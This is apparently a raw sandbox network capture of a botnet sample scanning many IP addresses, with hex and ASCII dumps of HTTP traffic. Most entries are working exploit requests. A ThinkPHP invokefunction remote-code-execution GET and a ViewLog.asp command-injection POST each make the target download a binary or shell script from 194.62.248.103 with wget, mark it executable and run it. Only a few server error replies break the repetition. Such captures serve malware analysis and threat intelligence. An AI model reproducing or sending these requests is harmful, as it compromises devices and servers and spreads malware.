                                                        Apr 14, 2024 16:35:15.847114086 CEST321INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.20.1
                                                        Date: Sun, 14 Apr 2024 14:35:15 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 157
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        114192.168.2.235400295.86.76.6980
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:15.543180943 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        115192.168.2.235245295.10.12.10380
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:15.543523073 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:15.893963099 CEST502INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Sun, 14 Apr 2024 14:35:19 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        116192.168.2.234480295.86.70.25080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:15.549021959 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        117192.168.2.233572062.241.72.2078080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:15.578680992 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        118192.168.2.233471231.136.98.458080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:15.615205050 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:16.579320908 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:18.499017954 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:22.306622028 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:29.985554934 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:45.343384027 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:16.826963902 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        119192.168.2.234822494.123.122.1738080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:15.731363058 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        120192.168.2.234018895.86.99.988080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:15.738878012 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        121192.168.2.234472688.150.141.5080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:15.809782982 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        122192.168.2.235953431.136.52.1348080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:16.397468090 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:17.379350901 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:19.298926115 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:23.330374956 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:31.009314060 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:46.367425919 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:18.874701977 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        123192.168.2.235713285.175.161.668080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:16.406116962 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:16.732758999 CEST88INHTTP/1.1 404 Not Found
                                                        Connection: Keep-Alive
                                                        Transfer-Encoding: chunked


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        124192.168.2.234366094.112.164.1958080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:16.408442974 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        125192.168.2.234718831.31.61.1418080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:16.421241045 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:18.179102898 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:20.258793116 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:24.610220909 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:33.057126045 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:50.206732035 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:25.017880917 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        126192.168.2.233883685.26.230.2218080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:16.927124977 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
